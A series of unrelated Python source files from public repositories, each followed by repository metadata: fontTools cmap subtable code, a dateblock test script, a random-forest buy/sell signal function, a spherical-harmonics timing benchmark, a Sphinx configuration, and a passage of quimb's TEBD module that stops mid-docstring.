dataList.append(struct.pack(">LLL", startCharCode, lastCharCode, startGlyphID))
nGroups = nGroups + 1
data = bytesjoin(dataList)
lengthSubtable = len(data) +16
assert len(data) == (nGroups*12) == (lengthSubtable-16)
return struct.pack(">HHLLL", self.format, self.reserved , lengthSubtable, self.language, nGroups) + data
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("format", self.format),
("reserved", self.reserved),
("length", self.length),
("language", self.language),
("nGroups", self.nGroups),
])
writer.newline()
codes = sorted(self.cmap.items())
self._writeCodes(codes, writer)
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.format = safeEval(attrs["format"])
self.reserved = safeEval(attrs["reserved"])
self.length = safeEval(attrs["length"])
self.language = safeEval(attrs["language"])
self.nGroups = safeEval(attrs["nGroups"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
class cmap_format_12(cmap_format_12_or_13):
def __init__(self, format):
cmap_format_12_or_13.__init__(self, format)
self._format_step = 1
def _computeGIDs(self, startingGlyph, numberOfGlyphs):
return list(range(startingGlyph, startingGlyph + numberOfGlyphs))
def _IsInSameRun(self, glyphID, lastGlyphID, charCode, lastCharCode):
return (glyphID == 1 + lastGlyphID) and (charCode == 1 + lastCharCode)
class cmap_format_13(cmap_format_12_or_13):
def __init__(self, format):
cmap_format_12_or_13.__init__(self, format)
self._format_step = 0
def _computeGIDs(self, startingGlyph, numberOfGlyphs):
return [startingGlyph] * numberOfGlyphs
def _IsInSameRun(self, glyphID, lastGlyphID, charCode, lastCharCode):
return (glyphID == lastGlyphID) and (charCode == 1 + lastCharCode)
def cvtToUVS(threeByteString):
data = b"\0" + threeByteString
val, = struct.unpack(">L", data)
return val
def cvtFromUVS(val):
assert 0 <= val < 0x1000000
fourByteString = struct.pack(">L", val)
return fourByteString[1:]
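# Illustrative round trip for the two helpers above (values chosen arbitrarily):
#   cvtToUVS(b"\x01\x00\x00") == 0x010000
#   cvtFromUVS(0x010000) == b"\x01\x00\x00"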
class cmap_format_14(CmapSubtable):
def decompileHeader(self, data, ttFont):
format, length, numVarSelectorRecords = struct.unpack(">HLL", data[:10])
self.data = data[10:]
self.length = length
self.numVarSelectorRecords = numVarSelectorRecords
self.ttFont = ttFont
self.language = 0xFF # has no language.
def decompile(self, data, ttFont):
if data is not None and ttFont is not None and ttFont.lazy:
self.decompileHeader(data, ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data
self.cmap = {} # so that clients that expect this to exist in a cmap table won't fail.
uvsDict = {}
recOffset = 0
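		# Each 11-byte VariationSelectorRecord is a 3-byte (uint24) variation selector
		# followed by two uint32 offsets to the default and non-default UVS tables
		# (zero when the table is absent).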
for n in range(self.numVarSelectorRecords):
uvs, defOVSOffset, nonDefUVSOffset = struct.unpack(">3sLL", data[recOffset:recOffset +11])
recOffset += 11
varUVS = cvtToUVS(uvs)
if defOVSOffset:
startOffset = defOVSOffset - 10
numValues, = struct.unpack(">L", data[startOffset:startOffset+4])
startOffset +=4
for r in range(numValues):
uv, addtlCnt = struct.unpack(">3sB", data[startOffset:startOffset+4])
startOffset += 4
firstBaseUV = cvtToUVS(uv)
cnt = addtlCnt+1
baseUVList = list(range(firstBaseUV, firstBaseUV+cnt))
glyphList = [None]*cnt
localUVList = zip(baseUVList, glyphList)
try:
uvsDict[varUVS].extend(localUVList)
except KeyError:
uvsDict[varUVS] = list(localUVList)
if nonDefUVSOffset:
startOffset = nonDefUVSOffset - 10
numRecs, = struct.unpack(">L", data[startOffset:startOffset+4])
startOffset +=4
localUVList = []
for r in range(numRecs):
uv, gid = struct.unpack(">3sH", data[startOffset:startOffset+5])
startOffset += 5
uv = cvtToUVS(uv)
glyphName = self.ttFont.getGlyphName(gid)
localUVList.append( [uv, glyphName] )
try:
uvsDict[varUVS].extend(localUVList)
except KeyError:
uvsDict[varUVS] = localUVList
self.uvsDict = uvsDict
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("format", self.format),
("length", self.length),
("numVarSelectorRecords", self.numVarSelectorRecords),
])
writer.newline()
uvsDict = self.uvsDict
uvsList = sorted(uvsDict.keys())
for uvs in uvsList:
uvList = uvsDict[uvs]
uvList.sort(key=lambda item: (item[1] is not None, item[0], item[1]))
for uv, gname in uvList:
if gname is None:
gname = "None"
				# I use the arg rather than the keyword syntax in order to preserve the attribute order.
writer.simpletag("map", [ ("uvs",hex(uvs)), ("uv",hex(uv)), ("name", gname)] )
writer.newline()
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.format = safeEval(attrs["format"])
self.length = safeEval(attrs["length"])
self.numVarSelectorRecords = safeEval(attrs["numVarSelectorRecords"])
self.language = 0xFF # provide a value so that CmapSubtable.__lt__() won't fail
if not hasattr(self, "cmap"):
self.cmap = {} # so that clients that expect this to exist in a cmap table won't fail.
if not hasattr(self, "uvsDict"):
self.uvsDict = {}
uvsDict = self.uvsDict
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
uvs = safeEval(attrs["uvs"])
uv = safeEval(attrs["uv"])
gname = attrs["name"]
if gname == "None":
gname = None
try:
uvsDict[uvs].append( [uv, gname])
except KeyError:
uvsDict[uvs] = [ [uv, gname] ]
def compile(self, ttFont):
if self.data:
return struct.pack(">HLL", self.format, self.length , self.numVarSelectorRecords) + self.data
uvsDict = self.uvsDict
uvsList = sorted(uvsDict.keys())
self.numVarSelectorRecords = len(uvsList)
offset = 10 + self.numVarSelectorRecords*11 # current value is end of VarSelectorRecords block.
data = []
varSelectorRecords =[]
for uvs in uvsList:
entryList = uvsDict[uvs]
defList = [entry for entry in entryList if entry[1] is None]
if defList:
defList = [entry[0] for entry in defList]
defOVSOffset = offset
defList.sort()
lastUV = defList[0]
cnt = -1
defRecs = []
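				# Collapse the sorted default UVS values into ranges: each record stores
				# the range start as 3 bytes plus a 1-byte count of the additional
				# consecutive code points that follow it.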
for defEntry in defList:
cnt +=1
if (lastUV+cnt) != defEntry:
rec = struct.pack(">3sB", cvtFromUVS(lastUV), cnt-1)
lastUV = defEntry
defRecs.append(rec)
cnt = 0
rec = struct.pack(">3sB", cvtFromUVS(lastUV), cnt)
defRecs.append(rec)
numDefRecs = len(defRecs)
data.append(struct.pack(">L", numDefRecs))
data.extend(defRecs)
offset += 4 + numDefRecs*4
else:
defOVSOffset = 0
ndefList = [entry for entry in entryList if entry[1] is not None]
if ndefList:
nonDefUVSOffset = offset
ndefList.sort()
numNonDefRecs = len(ndefList)
data.append(struct.pack(">L", numNonDefRecs))
offset += 4 + numNonDefRecs*5
for uv, gname in ndefList:
gid = ttFont.getGlyphID(gname)
ndrec = struct.pack(">3sH", cvtFromUVS(uv), gid)
data.append(ndrec)
else:
nonDefUVSOffset = 0
vrec = struct.pack(">3sLL", cvtFromUVS(uvs), defOVSOffset, nonDefUVSOffset)
varSelectorRecords.append(vrec)
data = bytesjoin(varSelectorRecords) + bytesjoin(data)
self.length = 10 + len(data)
headerdata = struct.pack(">HLL", self.format, self.length , self.numVarSelectorRecords)
self.data = headerdata + data
return self.data
class cmap_format_unknown(CmapSubtable):
def toXML(self, writer, ttFont):
cmapName = self.__class__.__name__[:12] + str(self.format)
writer.begintag(cmapName, [
("platformID", self.platformID),
("platEncID", self.platEncID),
])
writer.newline()
writer.dumphex(self.data)
writer.endtag(cmapName)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.data = readHex(content)
self.cmap = {}
def decompileHeader(self, data, ttFont):
self.language = 0 # dummy value
self.data = data
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
			self.decompileHeader(data, ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
def compile(self, ttFont):
if self.data:
return self.data
else:
return None
cmap_classes = {
0: cmap_format_0,
2: cmap_format_2,
4: cmap_format_4,
6: cmap_format_6,
12: cmap_format_12,
13: cmap_format_13,
14: cmap_format_14,
}
|
googlei18n/fontuley
|
src/third_party/fontTools/Lib/fontTools/ttLib/tables/_c_m_a_p.py
|
Python
|
apache-2.0
| 45,080 | 0.032276 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Datetools provide a method of manipulating and working dates and times.
# Copyright (C) 2013-2018 Chris Caron <lead2gold@gmail.com>
#
# This file is part of Datetools. Datetools is free software; you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
This is just a simple tool for testing that the output is as expected
"""
from datetime import datetime
from dateblock import dateblock
from datetime import date
from datetime import time
# Support python datetime object
print dateblock("*/1", ref=datetime(2000, 5, 3, 10, 10, 0))
# Support python date object
print dateblock("*/1", ref=date(2000, 5, 3))
# Support python time object
print dateblock("*/1", ref=time(20, 5, 3), block=False)
# Time equals 'now'
print dateblock("*/1", ref=None, block=False)
# Epoch Time
print dateblock("*/1", ref=7999434323, block=False)
# Drift Time
print dateblock("*/10 +5", ref=7999434323, block=False)
# Blocking should never be possible if the time is in the past
print dateblock("*/10 +7", ref=999434323, block=True)
# Drifting inline
print dateblock("*/10 +5", ref=date(2000, 1, 1), block=False)
# Drifting inline (with option specified, inline should over-ride)
# Drifting without use of +
print dateblock("*/10 * * * * * 5", ref=date(2000, 2, 1), block=False)
# Drifting with multiple options specified
print dateblock("* 10 +5,8", ref=date(2000, 3, 1), block=False)
|
caronc/datetools
|
src/pytest.py
|
Python
|
gpl-2.0
| 2,031 | 0 |
import pandas as pd
import numpy as np
from random import sample
from sklearn.ensemble import RandomForestClassifier
def ML_BuySell(all_data, predictDate, predictors, previous_results, limit=0.0051,
limit_comp=np.arange(-.015, 0.02, 0.001), days_previous=252, train_split=0.8, n=3,acc_limit=0.75):
"""
    This function takes all the information about previous trades and uses a random forest model to predict
    what is going to happen on the query date.
:param all_data: pandas DataFrame, All technical details. generated from Predictors class
:param predictDate: pandas DateTime, The timestamp you want to look at
:param predictors: array, containing the names of the technical indicators used.
:param previous_results: pandas DataFrame, containing the daily percentage change
:param limit: float, the minimum limit for which trades can occur
:param limit_comp: numpy array, a list of percentages to check
:param days_previous: int, How many previous days should be simulated
:param train_split: float, Training/Testing split between (0, 1)
    :param n: int, number of random forest classifiers
:param acc_limit: float, specifies the minimum accuracy for a trade to take place.
:return: pandas DataFrame containing Buy and Sell commands.
"""
# Split into testing and training data.
ALLX_DATA = all_data.ix[all_data.index < predictDate, predictors]
if len(ALLX_DATA) < days_previous:
return
ALLY_DATA = previous_results.ix[all_data.index <= predictDate].shift(-1)
ALLY_DATA = ALLY_DATA.drop(ALLY_DATA.index[-1])
fluc_m = []
X_TEST_B = ALLX_DATA[(-1 * days_previous):]
Y_TEST_B = ALLY_DATA[(-1 * days_previous):]
# Get parameters for the day in question
PREDICT_X = all_data.ix[all_data.index == predictDate, predictors]
if PREDICT_X.empty:
return
pred_v = []
acc = []
for x in np.nditer(limit_comp):
indices = sample(range(days_previous), int(np.round(days_previous * train_split)))
X_TRAIN = X_TEST_B.ix[indices]
Y_TRAIN = Y_TEST_B.ix[indices]
X_TEST = X_TEST_B.drop(X_TEST_B.index[indices])
Y_TEST = Y_TEST_B.drop(Y_TEST_B.index[indices])
# Fit the training data
fluc_m.append(RandomForestClassifier(n_estimators=n))
fluc_m[-1].fit(X_TRAIN, 1*(Y_TRAIN > x))
# See how well we did
a = fluc_m[-1].score(X_TEST, 1*(Y_TEST > x))
acc.append(a)
# Predict the future
pred_v.append(fluc_m[-1].predict(PREDICT_X)[0])
# Make an estimate of the daily change
change = 0
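    # Scan the threshold grid: where the classifier's prediction flips from 1
    # (expected to exceed the threshold) to 0, take that threshold as the
    # estimated size of the move and accumulate it.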
for i in range(1, len(limit_comp)):
l = (pred_v[i - 1] > pred_v[i])
if l:
change = change + (l* limit_comp[i])
    # If it is more than what we want, proceed.
if change > limit:
return pd.concat([
pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"],
"Regime": 1,
"Signal": "Buy"}),
pd.DataFrame({"Price": all_data.ix[all_data.index == predictDate, "price"],
"Regime": -1,
"Signal": "Sell"})
])
else:
return None
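# Minimal usage sketch (illustrative only): assumes `tech` is a DataFrame of
# technical indicators containing a 'price' column, and `returns` holds daily
# percentage changes on the same index; the predictor names are hypothetical.
#
#   predictors = ['rsi', 'macd', 'sma_20']
#   signal = ML_BuySell(tech, tech.index[-1], predictors, returns)
#   if signal is not None:
#       print(signal[signal['Signal'] == 'Buy'])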
|
simonward86/MySJcLqwwx
|
ML_predict.py
|
Python
|
apache-2.0
| 3,255 | 0.006759 |
#!/usr/bin/env python
"""
This script is a python version of TimingAccuracyDHC. We use numpy functions to
simplify the creation of random coefficients.
"""
import os
import sys
import time
import numpy as np
sys.path.append(os.path.join(os.path.dirname(__file__), "../../.."))
import pyshtools as shtools
#==== MAIN FUNCTION ====
def main():
TimingAccuracyDHC()
#==== TEST FUNCTIONS ====
def TimingAccuracyDHC():
#---- input parameters ----
maxdeg = 2800
ls = np.arange(maxdeg + 1)
sampling = 1
beta = -1.5
#---- create mask to filter out m<=l ----
mask = np.zeros(2 * (maxdeg + 1) * (maxdeg + 1), dtype=np.bool).reshape(2, maxdeg + 1, maxdeg + 1)
mask[0, 0, 0] = True
for l in ls:
mask[:, l, :l + 1] = True
mask[1, :, 0] = False
#---- create Gaussian powerlaw coefficients ----
print 'creating {:d} random coefficients'.format(2 * (maxdeg + 1) * (maxdeg + 1))
cilm = np.zeros((2, (maxdeg + 1), (maxdeg + 1)), dtype=np.complex)
random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1))
cilm.imag = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1))
cilm.real = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) / (2. * ls[1:] + 1.))[None, :, None]
#---- time spherical harmonics transform for lmax set to increasing powers of 2 ----
lmax = 2
print 'lmax maxerror rms tinverse tforward'
while lmax <= maxdeg:
# trim coefficients to lmax
cilm_trim = cilm[:, :lmax + 1, :lmax + 1]
mask_trim = mask[:, :lmax + 1, :lmax + 1]
#synthesis / inverse
tstart = time.time()
grid = shtools.MakeGridDHC(cilm_trim, sampling=sampling)
tend = time.time()
tinverse = tend - tstart
#analysis / forward
tstart = time.time()
cilm2_trim = shtools.SHExpandDHC(grid, sampling=sampling)
tend = time.time()
tforward = tend - tstart
# compute error
err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_trim]) / np.abs(cilm_trim[mask_trim])
maxerr = err.max()
rmserr = np.mean(err**2)
print '{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s'.\
format(lmax, maxerr, rmserr, tinverse, tforward)
lmax = lmax * 2
#==== EXECUTE SCRIPT ====
if __name__ == "__main__":
main()
|
ian-r-rose/SHTOOLS
|
examples/python/TimingAccuracy/TimingAccuracyDHC.py
|
Python
|
bsd-3-clause
| 2,509 | 0.007573 |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-functions documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-functions"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-functions",
"github_user": "googleapis",
"github_repo": "python-functions",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-functions-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-functions.tex",
"google-cloud-functions Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-functions",
"google-cloud-functions Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-functions",
"google-cloud-functions Documentation",
author,
"google-cloud-functions",
"google-cloud-functions Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
|
googleapis/python-functions
|
docs/conf.py
|
Python
|
apache-2.0
| 12,404 | 0.000564 |
import numpy as np
import quimb as qu
class NNI:
"""An simple interacting hamiltonian object used, for instance, in TEBD.
Once instantiated, the ``NNI`` hamiltonian can be called like ``H_nni()``
to get the default two-site term, or ``H_nni((i, j))`` to get the term
specific to sites ``i`` and ``j``.
If the terms supplied are anything but a single, two-site term, then the
length of hamiltonian ``n`` must be specified too as the gates will no
longer be completely translationally invariant.
Parameters
----------
H2 : array_like or dict[tuple[int], array_like]
The sum of interaction terms. If a dict is given, the keys should be
nearest neighbours like ``(10, 11)``, apart from any default term which
should have the key ``None``, and the values should be the sum of
interaction terms for that interaction.
H1 : array_like or dict[int, array_like], optional
The sum of single site terms. If a dict is given, the keys should be
integer sites, apart from any default term which should have the key
``None``, and the values should be the sum of single site terms for
that site.
n : int, optional
The size of the hamiltonian.
cyclic : bool, optional
Whether the hamiltonian has periodic boundary conditions or not.
Attributes
----------
special_sites : set[(int, int)]
This keeps track of which pairs of sites don't just have the default
term
Examples
--------
A simple, translationally invariant, interaction-only ``NNI``::
>>> XX = pauli('X') & pauli('X')
>>> YY = pauli('Y') & pauli('Y')
>>> H_nni = NNI(XX + YY)
The same, but with a translationally invariant field as well (need to set
``n`` since the last gate will be different)::
>>> Z = pauli('Z')
>>> H_nni = NNI(H2=XX + YY, H1=Z, n=100)
Specifying a default interaction and field, with custom values set for some
sites::
>>> H2 = {None: XX + YY, (49, 50): (XX + YY) / 2}
>>> H1 = {None: Z, 49: 2 * Z, 50: 2 * Z}
>>> H_nni = NNI(H2=H2, H1=H1, n=100)
Specifying the hamiltonian entirely through site specific interactions and
fields::
>>> H2 = {(i, i + 1): XX + YY for i in range(99)}
>>> H1 = {i: Z for i in range(100)}
>>> H_nni = NNI(H2=H2, H1=H1, n=100)
See Also
--------
SpinHam
"""
def __init__(self, H2, H1=None, n=None, cyclic=False):
self.n = n
self.cyclic = cyclic
if isinstance(H2, np.ndarray):
H2 = {None: H2}
if isinstance(H1, np.ndarray):
H1 = {None: H1}
self.H2s = dict(H2)
self.H2s.setdefault(None, None)
if H1 is not None:
self.H1s = dict(H1)
else:
self.H1s = {}
self.H1s.setdefault(None, None)
# sites where the term might be different
self.special_sites = {ij for ij in self.H2s if ij is not None}
self.special_sites |= {(i, i + 1) for i in self.H1s if i is not None}
obc_with_field = (not self.cyclic) and (self.H1s[None] is not None)
# make sure n is supplied if it is needed
if n is None:
if (self.special_sites or obc_with_field):
raise ValueError("Need to specify ``n`` if this ``NNI`` is "
"anything but completely translationally "
"invariant (including OBC w/ field).")
# manually add the last interaction as a special site for OBC w/ field
# since the last gate has to apply single site field to both sites
elif not self.cyclic:
if obc_with_field or (self.n - 1 in self.H1s):
self.special_sites.add((self.n - 2, self.n - 1))
# this is the cache for holding generated two-body terms
self._terms = {}
def gen_term(self, sites=None):
"""Generate the interaction term acting on ``sites``.
"""
# make sure have sites as (i, i + 1) if supplied
if sites is not None:
i, j = sites = tuple(sorted(sites))
if j - i != 1:
raise ValueError("Only nearest neighbour interactions are "
"supported for an ``NNI``.")
else:
i = j = None
term = self.H2s.get(sites, self.H2s[None])
if term is None:
raise ValueError(f"No term has been set for sites {sites}, either "
"specifically or via a default term.")
# add single site term to left site if present
H1 = self.H1s.get(i, self.H1s[None])
# but only if this site has a term set
if H1 is not None:
I_2 = qu.eye(H1.shape[0], dtype=H1.dtype)
term = term + qu.kron(H1, I_2)
# if not PBC, for the last interaction, add to right site as well
if sites and (j == self.n - 1) and (not self.cyclic):
H1 = self.H1s.get(j, self.H1s[None])
# but again, only if that site has a term set
if H1 is not None:
I_2 = qu.eye(H1.shape[0], dtype=H1.dtype)
term = term + qu.kron(I_2, H1)
return term
def __call__(self, sites=None):
"""Get the cached term for sites ``sites``, generate if necessary.
"""
try:
return self._terms[sites]
except KeyError:
term = self.gen_term(sites)
self._terms[sites] = term
return term
def mean_norm(self, ntype='fro'):
"""Computes the average frobenius norm of local terms. Also generates
all terms if not already cached.
"""
if self.n is None:
return qu.norm(self(), ntype)
nterms = self.n - int(not self.cyclic)
return sum(
qu.norm(self((i, i + 1)), ntype)
for i in range(nterms)
) / nterms
def __repr__(self):
return f"<NNI(n={self.n}, cyclic={self.cyclic})>"
class TEBD:
"""Class implementing Time Evolving Block Decimation (TEBD) [1].
[1] Guifré Vidal, Efficient Classical Simulation of Slightly Entangled
Quantum Computations, PRL 91, 147902 (2003)
Parameters
----------
p0 : MatrixProductState
Initial state.
H : NNI or array_like
Dense hamiltonian representing the two body interaction. Should have
shape ``(d * d, d * d)``, where ``d`` is the physical dimension of
``p0``.
dt : float, optional
Default time step, cannot be set as well as ``tol``.
tol : float, optional
Default target error for each evolution, cannot be set as well as
        ``dt``, which will instead be calculated from the trotter order, length
        of time, and hamiltonian norm.
t0 : float, optional
Initial time. Defaults to 0.0.
split_opts : dict, optional
Compression options applied for splitting after gate application, see
:func:`~quimb.tensor.tensor_core.tensor_split`.
